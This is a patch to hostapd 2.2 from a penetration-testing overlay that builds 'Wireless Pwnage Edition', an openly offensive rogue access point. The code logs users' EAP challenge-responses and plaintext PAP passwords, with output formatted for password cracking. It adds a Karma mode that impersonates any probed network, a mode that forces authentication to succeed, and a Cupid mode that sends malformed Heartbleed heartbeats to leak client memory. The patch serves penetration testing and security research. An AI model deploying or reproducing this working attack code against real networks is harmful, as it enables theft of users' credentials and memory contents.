Backup_Repos/pentoo-overlay
1
0
Fork 0
mirror of https://github.com/pentoo/pentoo-overlay synced 2025-12-20 07:16:42 +01:00
Code Issues Projects Releases Wiki Activity
pentoo-overlay/net-wireless/hostapd/files/hostapd-2.2-wpe.patch
Anton Bolshakov f3329109be hostapd: update wpe patch, 80211ac goodness, etc
2014-08-30 03:01:40 +00:00

884 lines
31 KiB
Diff
Raw Blame History

diff -rupN hostapd-2.2/hostapd/config_file.c hostapd-2.2-wpe/hostapd/config_file.c
--- hostapd-2.2/hostapd/config_file.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/hostapd/config_file.c 2014-08-14 08:45:54.629127667 -0400
@@ -20,7 +20,7 @@
#include "ap/wpa_auth.h"
#include "ap/ap_config.h"
#include "config_file.h"
-
+#include "wpe/wpe.h"
#ifndef CONFIG_NO_RADIUS
#ifdef EAP_SERVER
@@ -1955,6 +1955,20 @@ static int hostapd_config_fill(struct ho
return 1;
}
wpa_printf(MSG_DEBUG, "eapol_version=%d", bss->eapol_version);
+ } else if (os_strcmp(buf, "wpe_logfile") == 0) {
+ wpe_conf.wpe_logfile = os_strdup(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_before_handshake") == 0) {
+ wpe_conf.wpe_hb_send_before_handshake = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_before_appdata") == 0) {
+ wpe_conf.wpe_hb_send_before_appdata = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_after_appdata") == 0) {
+ wpe_conf.wpe_hb_send_after_appdata = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_payload_size") == 0) {
+ wpe_conf.wpe_hb_payload_size = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_num_repeats") == 0) {
+ wpe_conf.wpe_hb_num_repeats = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_num_tries") == 0) {
+ wpe_conf.wpe_hb_num_tries = atoi(pos);
#ifdef EAP_SERVER
} else if (os_strcmp(buf, "eap_authenticator") == 0) {
bss->eap_server = atoi(pos);
diff -rupN hostapd-2.2/hostapd/main.c hostapd-2.2-wpe/hostapd/main.c
--- hostapd-2.2/hostapd/main.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/hostapd/main.c 2014-08-14 08:45:54.637127773 -0400
@@ -27,7 +27,7 @@
#include "config_file.h"
#include "eap_register.h"
#include "ctrl_iface.h"
-
+#include "wpe/wpe.h"
struct hapd_global {
void **drv_priv;
@@ -412,11 +412,17 @@ static int hostapd_global_run(struct hap
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
+ "hostapd v" VERSION_STR "\n"
"User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2014, Jouni Malinen <j@w1.fi> "
- "and contributors\n");
+ "and contributors\n"
+ "-----------------------------------------------------\n"
+ "WPE (Wireless Pwnage Edition)\n"
+ "This version has been cleverly modified to target\n"
+ "wired and wireless users.\n"
+ "Brad Antoniewicz <@brad_anton>\n"
+ "Foundstone\n");
}
@@ -425,7 +431,7 @@ static void usage(void)
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] "
+ "usage: hostapd [-hdBKtvskc] [-P <PID file>] [-e <entropy file>] "
"\\\n"
" [-g <global ctrl_iface>] [-G <group>] \\\n"
" <configuration file(s)>\n"
@@ -447,7 +453,12 @@ static void usage(void)
" (records all messages regardless of debug verbosity)\n"
#endif /* CONFIG_DEBUG_LINUX_TRACING */
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n\n"
+ " WPE Options -------------------\n"
+ " (credential logging always enabled)\n"
+ " -s Return Success where possible\n"
+ " -k Karma Mode (Respond to all probes)\n"
+ " -c Cupid Mode (Heartbleed clients)\n\n");
exit(1);
}
@@ -554,7 +565,7 @@ int main(int argc, char *argv[])
interfaces.global_ctrl_sock = -1;
for (;;) {
- c = getopt(argc, argv, "b:Bde:f:hKP:Ttu:vg:G:");
+ c = getopt(argc, argv, "b:Bde:f:hKP:Ttu:vg:G:kcs");
if (c < 0)
break;
switch (c) {
@@ -615,6 +626,15 @@ int main(int argc, char *argv[])
case 'u':
return gen_uuid(optarg);
#endif /* CONFIG_WPS */
+ case 'k':
+ wpe_conf.wpe_enable_karma++;
+ break;
+ case 'c':
+ wpe_conf.wpe_enable_cupid++;
+ break;
+ case 's':
+ wpe_conf.wpe_enable_return_success++;
+ break;
default:
usage();
break;
diff -rupN hostapd-2.2/hostapd/Makefile hostapd-2.2-wpe/hostapd/Makefile
--- hostapd-2.2/hostapd/Makefile 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/hostapd/Makefile 2014-08-14 08:45:54.641127921 -0400
@@ -59,6 +59,7 @@ OBJS += ../src/ap/preauth_auth.o
OBJS += ../src/ap/pmksa_cache_auth.o
OBJS += ../src/ap/ieee802_11_shared.o
OBJS += ../src/ap/beacon.o
+OBJS += ../src/wpe/wpe.o
OBJS_c = hostapd_cli.o ../src/common/wpa_ctrl.o ../src/utils/os_$(CONFIG_OS).o
@@ -913,15 +914,15 @@ install: all
BCHECK=../src/drivers/build.hostapd
-hostapd: $(BCHECK) $(OBJS)
- $(Q)$(CC) $(LDFLAGS) -o hostapd $(OBJS) $(LIBS)
+hostapd: $(BCHECK) $(OBJS)
+ $(Q)$(CC) $(LDFLAGS) -o hostapd $(OBJS) $(LIBS)
@$(E) " LD " $@
ifdef CONFIG_WPA_TRACE
OBJS_c += ../src/utils/trace.o
endif
-hostapd_cli: $(OBJS_c)
- $(Q)$(CC) $(LDFLAGS) -o hostapd_cli $(OBJS_c) $(LIBS_c)
+hostapd_cli: $(OBJS_c)
+ $(Q)$(CC) $(LDFLAGS) -o hostapd_cli $(OBJS_c) $(LIBS_c)
@$(E) " LD " $@
NOBJS = nt_password_hash.o ../src/crypto/ms_funcs.o $(SHA1OBJS) ../src/crypto/md5.o
diff -rupN hostapd-2.2/src/ap/beacon.c hostapd-2.2-wpe/src/ap/beacon.c
--- hostapd-2.2/src/ap/beacon.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/ap/beacon.c 2014-08-14 08:45:54.641127921 -0400
@@ -28,7 +28,7 @@
#include "beacon.h"
#include "hs20.h"
#include "dfs.h"
-
+#include "wpe/wpe.h"
#ifdef NEED_AP_MLME
@@ -582,6 +582,13 @@ void handle_probe_req(struct hostapd_dat
}
#endif /* CONFIG_P2P */
+ if (wpe_conf.wpe_enable_karma && elems.ssid_len > 0) {
+ wpa_printf(MSG_MSGDUMP,"[WPE] Probe request from " MACSTR ", changing SSID to '%s'", MAC2STR(mgmt->sa), wpa_ssid_txt(elems.ssid, elems.ssid_len));
+ hostapd_set_ssid(hapd,elems.ssid,elems.ssid_len);
+ os_memcpy(&hapd->conf->ssid.ssid,elems.ssid,elems.ssid_len);
+ hapd->conf->ssid.ssid_len = elems.ssid_len;
+ }
+
res = ssid_match(hapd, elems.ssid, elems.ssid_len,
elems.ssid_list, elems.ssid_list_len);
if (res != NO_SSID_MATCH) {
diff -rupN hostapd-2.2/src/ap/ieee802_11.c hostapd-2.2-wpe/src/ap/ieee802_11.c
--- hostapd-2.2/src/ap/ieee802_11.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/ap/ieee802_11.c 2014-08-14 08:45:54.641127921 -0400
@@ -39,7 +39,7 @@
#include "wnm_ap.h"
#include "ieee802_11.h"
#include "dfs.h"
-
+#include "wpe/wpe.h"
u8 * hostapd_eid_supp_rates(struct hostapd_data *hapd, u8 *eid)
{
@@ -790,8 +790,8 @@ static u16 check_ssid(struct hostapd_dat
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ if ((!wpe_conf.wpe_enable_karma) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
HOSTAPD_LEVEL_INFO,
"Station tried to associate with unknown SSID "
diff -rupN hostapd-2.2/src/crypto/ms_funcs.c hostapd-2.2-wpe/src/crypto/ms_funcs.c
--- hostapd-2.2/src/crypto/ms_funcs.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/crypto/ms_funcs.c 2014-08-14 08:45:54.649128041 -0400
@@ -78,7 +78,7 @@ static int utf8_to_ucs2(const u8 *utf8_s
* @challenge: 8-octet Challenge (OUT)
* Returns: 0 on success, -1 on failure
*/
-static int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
const u8 *username, size_t username_len,
u8 *challenge)
{
diff -rupN hostapd-2.2/src/crypto/ms_funcs.h hostapd-2.2-wpe/src/crypto/ms_funcs.h
--- hostapd-2.2/src/crypto/ms_funcs.h 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/crypto/ms_funcs.h 2014-08-14 08:45:54.649128041 -0400
@@ -9,6 +9,10 @@
#ifndef MS_FUNCS_H
#define MS_FUNCS_H
+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge,
+ const u8 *username, size_t username_len,
+ u8 *challenge);
+
int generate_nt_response(const u8 *auth_challenge, const u8 *peer_challenge,
const u8 *username, size_t username_len,
const u8 *password, size_t password_len,
diff -rupN hostapd-2.2/src/crypto/tls_openssl.c hostapd-2.2-wpe/src/crypto/tls_openssl.c
--- hostapd-2.2/src/crypto/tls_openssl.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/crypto/tls_openssl.c 2014-08-14 08:45:54.653128013 -0400
@@ -20,6 +20,7 @@
#include <openssl/err.h>
#include <openssl/pkcs12.h>
#include <openssl/x509v3.h>
+#include <openssl/rand.h>
#ifndef OPENSSL_NO_ENGINE
#include <openssl/engine.h>
#endif /* OPENSSL_NO_ENGINE */
@@ -28,6 +29,8 @@
#include "crypto.h"
#include "tls.h"
+#include "wpe/wpe.h"
+
#if OPENSSL_VERSION_NUMBER >= 0x0090800fL
#define OPENSSL_d2i_TYPE const unsigned char **
#else
@@ -71,6 +74,8 @@ static BIO * BIO_from_keystore(const cha
}
#endif /* ANDROID */
+int wpe_hb_enc(struct tls_connection *conn); // WPE: To limit changes up top
+
static int tls_openssl_ref_count = 0;
struct tls_context {
@@ -1029,7 +1034,10 @@ struct tls_connection * tls_connection_i
conn->context = context;
SSL_set_app_data(conn->ssl, conn);
- SSL_set_msg_callback(conn->ssl, tls_msg_cb);
+ if (wpe_conf.wpe_enable_cupid)
+ SSL_set_msg_callback(conn->ssl, wpe_hb_cb);
+ else
+ SSL_set_msg_callback(conn->ssl, tls_msg_cb);
SSL_set_msg_callback_arg(conn->ssl, conn);
options = SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 |
SSL_OP_SINGLE_DH_USE;
@@ -2552,8 +2560,10 @@ static struct wpabuf *
openssl_handshake(struct tls_connection *conn, const struct wpabuf *in_data,
int server)
{
- int res;
+ int res,i;
struct wpabuf *out_data;
+ struct wpabuf *wpe_hb_ptr1, *wpe_hb_ptr2;
+
/*
* Give TLS handshake data from the server (if available) to OpenSSL
@@ -2613,6 +2623,25 @@ openssl_handshake(struct tls_connection
}
wpabuf_put(out_data, res);
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_handshake && wpe_conf.wpe_hb_num_tries) {
+
+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat request instead of handshake\n");
+ wpe_hb_ptr1 = NULL;
+ for (i=0; i < wpe_conf.wpe_hb_num_repeats; i++) {
+ wpe_hb_ptr2 = wpabuf_alloc(wpe_hb_msg_len-1);
+ memcpy(wpabuf_mhead(wpe_hb_ptr2), (u8 *)wpe_hb_clear(), wpe_hb_msg_len-1);
+ wpabuf_put(wpe_hb_ptr2, wpe_hb_msg_len-1);
+ if (wpe_hb_ptr1) {
+ wpe_hb_ptr1 = wpabuf_concat(wpe_hb_ptr1,wpe_hb_ptr2);
+ } else {
+ wpe_hb_ptr1 = wpe_hb_ptr2;
+ }
+ }
+ conn->ssl->tlsext_hb_pending = 1;
+ wpe_conf.wpe_hb_num_tries--;
+ return wpe_hb_ptr1;
+ }
+
return out_data;
}
@@ -2722,6 +2751,10 @@ struct wpabuf * tls_connection_encrypt(v
tls_show_errors(MSG_INFO, __func__, "BIO_reset failed");
return NULL;
}
+
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_appdata)
+ wpe_hb_enc(conn);
+
res = SSL_write(conn->ssl, wpabuf_head(in_data), wpabuf_len(in_data));
if (res < 0) {
tls_show_errors(MSG_INFO, __func__,
@@ -2729,6 +2762,10 @@ struct wpabuf * tls_connection_encrypt(v
return NULL;
}
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_after_appdata)
+ wpe_hb_enc(conn);
+
+
/* Read encrypted data to be sent to the server */
buf = wpabuf_alloc(wpabuf_len(in_data) + 300);
if (buf == NULL)
@@ -3544,3 +3581,63 @@ int tls_connection_set_session_ticket_cb
return -1;
#endif /* EAP_FAST || EAP_FAST_DYNAMIC || EAP_SERVER_FAST */
}
+
+int wpe_hb_enc(struct tls_connection *conn) {
+ unsigned char *cbuf, *p;
+
+ unsigned int real_payload = 18; //default: 18 /* Sequence number + random bytes */
+ unsigned int padding = 16; //default: 16 /* Use minimum padding */
+
+ if (!SSL_is_init_finished(conn->ssl)) {
+ return -1;
+ }
+
+ if(!conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
+ conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS) {
+ wpa_printf(MSG_DEBUG, "[WPE] warning: heartbeat extension is unsupported (try anyway)\n");
+ } else {
+ wpa_printf(MSG_DEBUG,"[WPE] Heartbeat extention is supported, may not be vulnerable!\n");
+ }
+
+ /* Check if padding is too long, payload and padding
+ * must not exceed 2^14 - 3 = 16381 bytes in total.
+ */
+ OPENSSL_assert(real_payload + padding <= 16381);
+
+ cbuf = OPENSSL_malloc(1 + 2 + real_payload + padding);
+
+ if(cbuf==NULL)
+ return -1;
+
+ p = cbuf;
+
+ *p++ = TLS1_HB_REQUEST;
+
+
+ /* Payload length (18 bytes here) */
+ //s2n(payload, p); /* standards compliant payload */
+ //s2n(payload +10, p); /* >payload to exploit heartbleed!!! */
+ s2n(wpe_conf.wpe_hb_payload_size, p); /* configured payload */
+
+ /* Sequence number */
+ s2n(conn->ssl->tlsext_hb_seq, p);
+ /* 16 random bytes */
+ RAND_pseudo_bytes(p, 16);
+ //RAND_bytes(p, 16);
+ p += 16;
+ /* Random padding */
+ RAND_pseudo_bytes(p, padding);
+ //RAND_bytes(p, padding);
+
+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat reaquesting payload size %u...\n", wpe_conf.wpe_hb_payload_size);
+ wpa_hexdump(MSG_DEBUG, "[WPE] heartbeat packet to send:", cbuf, 1 + 2 + real_payload + padding);
+
+ /* Send heartbeat request */
+ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, TLS1_RT_HEARTBEAT,
+ cbuf, 3 + real_payload + padding) >= 0)
+ conn->ssl->tlsext_hb_pending = 1;
+ OPENSSL_free(cbuf);
+
+ return 0;
+}
+
diff -rupN hostapd-2.2/src/eap_server/eap_server.c hostapd-2.2-wpe/src/eap_server/eap_server.c
--- hostapd-2.2/src/eap_server/eap_server.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/eap_server/eap_server.c 2014-08-14 08:45:54.653128013 -0400
@@ -22,7 +22,8 @@
#define STATE_MACHINE_DATA struct eap_sm
#define STATE_MACHINE_DEBUG_PREFIX "EAP"
-#define EAP_MAX_AUTH_ROUNDS 50
+//#define EAP_MAX_AUTH_ROUNDS 50
+#define EAP_MAX_AUTH_ROUNDS 50000 // wpe >:)
static void eap_user_free(struct eap_user *user);
@@ -95,6 +96,8 @@ int eap_user_get(struct eap_sm *sm, cons
{
struct eap_user *user;
+ char ident = 't';
+
if (sm == NULL || sm->eapol_cb == NULL ||
sm->eapol_cb->get_eap_user == NULL)
return -1;
@@ -106,6 +109,11 @@ int eap_user_get(struct eap_sm *sm, cons
if (user == NULL)
return -1;
+ if (phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
+
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
diff -rupN hostapd-2.2/src/eap_server/eap_server_mschapv2.c hostapd-2.2-wpe/src/eap_server/eap_server_mschapv2.c
--- hostapd-2.2/src/eap_server/eap_server_mschapv2.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/eap_server/eap_server_mschapv2.c 2014-08-14 08:45:54.653128013 -0400
@@ -12,7 +12,7 @@
#include "crypto/ms_funcs.h"
#include "crypto/random.h"
#include "eap_i.h"
-
+#include "wpe/wpe.h"
struct eap_mschapv2_hdr {
u8 op_code; /* MSCHAPV2_OP_* */
@@ -291,7 +291,7 @@ static void eap_mschapv2_process_respons
size_t username_len, user_len;
int res;
char *buf;
-
+ u8 wpe_challenge_hash[8];
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
if (pos == NULL || len < 1)
@@ -329,6 +329,8 @@ static void eap_mschapv2_process_respons
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+ challenge_hash(peer_challenge, data->auth_challenge, name, name_len, wpe_challenge_hash);
+ wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24);
buf = os_malloc(name_len * 4 + 1);
if (buf) {
@@ -393,6 +395,11 @@ static void eap_mschapv2_process_respons
return;
}
+ if (wpe_conf.wpe_enable_return_success) {
+ os_memset((void *)nt_response, 0, 24);
+ os_memset((void *)expected, 0, 24);
+ }
+
if (os_memcmp(nt_response, expected, 24) == 0) {
const u8 *pw_hash;
u8 pw_hash_buf[16], pw_hash_hash[16];
@@ -430,6 +437,8 @@ static void eap_mschapv2_process_respons
wpa_printf(MSG_DEBUG, "EAP-MSCHAPV2: Invalid NT-Response");
data->state = FAILURE_REQ;
}
+ if (wpe_conf.wpe_enable_return_success)
+ data->state = SUCCESS;
}
diff -rupN hostapd-2.2/src/eap_server/eap_server_peap.c hostapd-2.2-wpe/src/eap_server/eap_server_peap.c
--- hostapd-2.2/src/eap_server/eap_server_peap.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/eap_server/eap_server_peap.c 2014-08-14 08:45:54.653128013 -0400
@@ -17,7 +17,7 @@
#include "eap_common/eap_tlv_common.h"
#include "eap_common/eap_peap_common.h"
#include "tncs.h"
-
+#include "wpe/wpe.h"
/* Maximum supported PEAP version
* 0 = Microsoft's PEAP version 0; draft-kamath-pppext-peapv0-00.txt
@@ -850,7 +850,7 @@ auth_method:
eap_peap_state(data, PHASE2_METHOD);
next_type = sm->user->methods[0].method;
sm->user_eap_method_index = 1;
- wpa_printf(MSG_DEBUG, "EAP-PEAP: try EAP type %d", next_type);
+ wpa_printf(MSG_DEBUG, "EAP-PEAPa: try EAP type %d", next_type);
eap_peap_phase2_init(sm, data, next_type);
}
#endif /* EAP_SERVER_TNC */
@@ -969,8 +969,8 @@ static void eap_peap_process_phase2_resp
break;
}
#endif /* EAP_SERVER_TNC */
-
- eap_peap_state(data, PHASE2_METHOD);
+ eap_peap_state(data, PHASE2_METHOD);
+ //data->tlv_request = TLV_REQ_SUCCESS ;
next_type = sm->user->methods[0].method;
sm->user_eap_method_index = 1;
wpa_printf(MSG_DEBUG, "EAP-PEAP: try EAP type %d", next_type);
@@ -986,8 +986,7 @@ static void eap_peap_process_phase2_resp
__func__, data->state);
break;
}
-
- eap_peap_phase2_init(sm, data, next_type);
+ eap_peap_phase2_init(sm, data, next_type);
}
diff -rupN hostapd-2.2/src/eap_server/eap_server_ttls.c hostapd-2.2-wpe/src/eap_server/eap_server_ttls.c
--- hostapd-2.2/src/eap_server/eap_server_ttls.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/eap_server/eap_server_ttls.c 2014-08-14 08:45:54.657127982 -0400
@@ -16,7 +16,7 @@
#include "eap_server/eap_tls_common.h"
#include "eap_common/chap.h"
#include "eap_common/eap_ttls.h"
-
+#include "wpe/wpe.h"
#define EAP_TTLS_VERSION 0
@@ -508,9 +508,11 @@ static void eap_ttls_process_phase2_pap(
return;
}
- if (sm->user->password_len != user_password_len ||
+ wpe_log_basic("eap-ttls/pap", sm->identity, sm->identity_len, user_password, user_password_len);
+
+ if ((!wpe_conf.wpe_enable_return_success) && (sm->user->password_len != user_password_len ||
os_memcmp(sm->user->password, user_password, user_password_len) !=
- 0) {
+ 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: Invalid user password");
eap_ttls_state(data, FAILURE);
return;
@@ -570,8 +572,10 @@ static void eap_ttls_process_phase2_chap
/* MD5(Ident + Password + Challenge) */
chap_md5(password[0], sm->user->password, sm->user->password_len,
challenge, challenge_len, hash);
+
+ wpe_log_chalresp("eap-ttls/chap", sm->identity, sm->identity_len, challenge, challenge_len, password, password_len);
- if (os_memcmp(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0) {
+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/CHAP: Correct user password");
eap_ttls_state(data, SUCCESS);
} else {
@@ -630,8 +634,11 @@ static void eap_ttls_process_phase2_msch
else
nt_challenge_response(challenge, sm->user->password,
sm->user->password_len, nt_response);
+
+ wpe_log_chalresp("eap-ttls/mschap", sm->identity, sm->identity_len, challenge, challenge_len, response + 2 + 24, 24);
+
- if (os_memcmp(nt_response, response + 2 + 24, 24) == 0) {
+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(nt_response, response + 2 + 24, 24) == 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAP: Correct response");
eap_ttls_state(data, SUCCESS);
} else {
@@ -652,7 +659,7 @@ static void eap_ttls_process_phase2_msch
u8 *response, size_t response_len)
{
u8 *chal, *username, nt_response[24], *rx_resp, *peer_challenge,
- *auth_challenge;
+ *auth_challenge, wpe_challenge_hash[8];
size_t username_len, i;
if (challenge == NULL || response == NULL ||
@@ -734,8 +741,11 @@ static void eap_ttls_process_phase2_msch
sm->user->password_len,
nt_response);
}
+ rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8;
+
+ challenge_hash(peer_challenge, auth_challenge, username, username_len, wpe_challenge_hash);
+ wpe_log_chalresp("eap-ttls/mschapv2", username, username_len, wpe_challenge_hash, 8, rx_resp, 24);
- rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8;
if (os_memcmp(nt_response, rx_resp, 24) == 0) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAPV2: Correct "
"NT-Response");
diff -rupN hostapd-2.2/src/Makefile hostapd-2.2-wpe/src/Makefile
--- hostapd-2.2/src/Makefile 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/Makefile 2014-08-14 08:45:54.657127982 -0400
@@ -1,4 +1,4 @@
-SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae radius rsn_supp tls utils wps
+SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae radius rsn_supp tls utils wps wpe
all:
for d in $(SUBDIRS); do [ -d $$d ] && $(MAKE) -C $$d; done
diff -rupN hostapd-2.2/src/utils/wpa_debug.c hostapd-2.2-wpe/src/utils/wpa_debug.c
--- hostapd-2.2/src/utils/wpa_debug.c 2014-06-04 09:26:14.000000000 -0400
+++ hostapd-2.2-wpe/src/utils/wpa_debug.c 2014-08-14 08:45:54.657127982 -0400
@@ -30,7 +30,7 @@ static FILE *wpa_debug_tracing_file = NU
int wpa_debug_level = MSG_INFO;
-int wpa_debug_show_keys = 0;
+int wpa_debug_show_keys = 1; // WPE >:)
int wpa_debug_timestamp = 0;
diff -rupN hostapd-2.2/src/wpe/Makefile hostapd-2.2-wpe/src/wpe/Makefile
--- hostapd-2.2/src/wpe/Makefile 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.2-wpe/src/wpe/Makefile 2014-08-14 08:45:54.657127982 -0400
@@ -0,0 +1,8 @@
+all:
+ @echo Nothing to be made.
+
+clean:
+ rm -f *~ *.o *.d *.gcno *.gcda *.gcov
+
+install:
+ @echo Nothing to be made.
diff -rupN hostapd-2.2/src/wpe/wpe.c hostapd-2.2-wpe/src/wpe/wpe.c
--- hostapd-2.2/src/wpe/wpe.c 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.2-wpe/src/wpe/wpe.c 2014-08-14 08:47:02.353123957 -0400
@@ -0,0 +1,209 @@
+/*
+ wpe.c -
+ brad.antoniewicz@foundstone.com
+ Implements WPE (Wireless Pwnage Edition) functionality within
+ hostapd.
+
+ WPE functionality focuses on targeting connecting users. At
+ it's core it implements credential logging (originally
+ implemented in FreeRADIUS-WPE), but also includes other patches
+ for other client attacks that have been modified to some extend.
+
+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
+*/
+
+#include <time.h>
+#include <openssl/ssl.h>
+#include "includes.h"
+#include "common.h"
+#include "wpe/wpe.h"
+#include "utils/wpa_debug.h"
+
+#define wpe_logfile_default_location "./hostapd-wpe.log"
+
+
+#define MSCHAPV2_CHAL_HASH_LEN 8
+#define MSCHAPV2_CHAL_LEN 16
+#define MSCHAPV2_RESP_LEN 24
+
+char wpe_hb_msg[] = "\x18\x03\x01\x00\x03\x01\xff\xff";
+size_t wpe_hb_msg_len = sizeof(wpe_hb_msg)/sizeof(wpe_hb_msg[0]);
+
+struct wpe_config wpe_conf = {
+ .wpe_logfile = wpe_logfile_default_location,
+ .wpe_logfile_fp = NULL,
+ .wpe_enable_karma = 0,
+ .wpe_enable_cupid = 0,
+ .wpe_enable_return_success = 0,
+ .wpe_hb_send_before_handshake = 1,
+ .wpe_hb_send_before_appdata = 0,
+ .wpe_hb_send_after_appdata = 0,
+ .wpe_hb_payload_size = 50000,
+ .wpe_hb_num_tries = 1,
+ .wpe_hb_num_repeats = 10
+};
+
+void wpe_log_file_and_stdout(char const *fmt, ...) {
+
+ if ( wpe_conf.wpe_logfile_fp == NULL ) {
+ wpe_conf.wpe_logfile_fp = fopen(wpe_conf.wpe_logfile, "a");
+ if ( wpe_conf.wpe_logfile_fp == NULL )
+ printf("WPE: Cannot file log file");
+ }
+
+ va_list ap;
+
+ va_start(ap, fmt);
+ vprintf(fmt, ap);
+ va_end(ap);
+
+ va_start(ap, fmt);
+ if ( wpe_conf.wpe_logfile_fp != NULL )
+ vfprintf(wpe_conf.wpe_logfile_fp, fmt, ap);
+ va_end(ap);
+}
+
+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len) {
+ time_t nowtime;
+ int x;
+
+ nowtime = time(NULL);
+
+ wpe_log_file_and_stdout("\n\n%s: %s", type, ctime(&nowtime));
+ wpe_log_file_and_stdout("\t username:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout("\n");
+
+ wpe_log_file_and_stdout("\t challenge:\t");
+ for (x=0; x<challenge_len - 1; x++)
+ wpe_log_file_and_stdout("%02x:",challenge[x]);
+ wpe_log_file_and_stdout("%02x\n",challenge[x]);
+
+ wpe_log_file_and_stdout("\t response:\t");
+ for (x=0; x<response_len - 1; x++)
+ wpe_log_file_and_stdout("%02x:",response[x]);
+ wpe_log_file_and_stdout("%02x\n",response[x]);
+
+ if (strncmp(type, "mschapv2", 8) == 0 || strncmp(type, "eap-ttls/mschapv2", 17) == 0) {
+ wpe_log_file_and_stdout("\t jtr NETNTLM:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout(":$NETNTLM$");
+
+ for (x=0; x<challenge_len; x++)
+ wpe_log_file_and_stdout("%02x",challenge[x]);
+ wpe_log_file_and_stdout("$");
+ for (x=0; x<response_len; x++)
+ wpe_log_file_and_stdout("%02x",response[x]);
+ wpe_log_file_and_stdout("\n");
+ }
+}
+
+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len) {
+ time_t nowtime;
+ int x;
+
+ nowtime = time(NULL);
+
+ wpe_log_file_and_stdout("\n\n%s: %s",type, ctime(&nowtime));
+ wpe_log_file_and_stdout("\t username:\t");
+ for (x=0; x<username_len; x++)
+ wpe_log_file_and_stdout("%c",username[x]);
+ wpe_log_file_and_stdout("\n");
+
